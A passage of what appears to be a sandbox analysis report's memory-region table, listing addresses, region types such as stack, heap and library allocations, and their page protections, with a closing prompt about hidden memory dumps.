stack
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page read and write
|
||
|
1248A893000
|
heap
|
page read and write
|
||
|
46766FE000
|
stack
|
page read and write
|
||
|
8853FBE000
|
stack
|
page read and write
|
||
|
1B680537000
|
trusted library allocation
|
page read and write
|
||
|
1A636B3F000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B812000
|
trusted library allocation
|
page read and write
|
||
|
1248A706000
|
heap
|
page read and write
|
||
|
4676ABE000
|
stack
|
page read and write
|
||
|
1248A893000
|
heap
|
page read and write
|
||
|
1248A6F5000
|
heap
|
page read and write
|
||
|
1B6F1370000
|
heap
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
2031FFD000
|
stack
|
page read and write
|
||
|
1248A6FA000
|
heap
|
page read and write
|
||
|
124889AC000
|
heap
|
page read and write
|
||
|
1248A898000
|
heap
|
page read and write
|
||
|
8853AFF000
|
stack
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page read and write
|
||
|
1248A6F1000
|
heap
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page read and write
|
||
|
1248A7A5000
|
heap
|
page read and write
|
||
|
1A61FF02000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B63B000
|
trusted library allocation
|
page read and write
|
||
|
1248A783000
|
heap
|
page read and write
|
||
|
1248A703000
|
heap
|
page read and write
|
||
|
1B680400000
|
trusted library allocation
|
page read and write
|
||
|
1B6EF4B0000
|
heap
|
page readonly
|
||
|
1A61F949000
|
trusted library allocation
|
page read and write
|
||
|
1A61E3C4000
|
heap
|
page read and write
|
||
|
1248A7B0000
|
heap
|
page read and write
|
||
|
4676B3E000
|
stack
|
page read and write
|
||
|
7FFD9B6DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
20318FA000
|
stack
|
page read and write
|
||
|
1248A706000
|
heap
|
page read and write
|
||
|
12488930000
|
heap
|
page read and write
|
||
|
1A61E7E1000
|
trusted library allocation
|
page read and write
|
||
|
1248A797000
|
heap
|
page read and write
|
||
|
1A61EF49000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1248A79F000
|
heap
|
page read and write
|
||
|
12488C0E000
|
heap
|
page read and write
|
||
|
8853C3E000
|
stack
|
page read and write
|
||
|
1A61C9CE000
|
heap
|
page read and write
|
||
|
12488C0E000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B67C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A61C8F0000
|
heap
|
page read and write
|
||
|
467760D000
|
stack
|
page read and write
|
||
|
7FFD9B9B4000
|
trusted library allocation
|
page read and write
|
There are 413 hidden memdumps, click here to show them.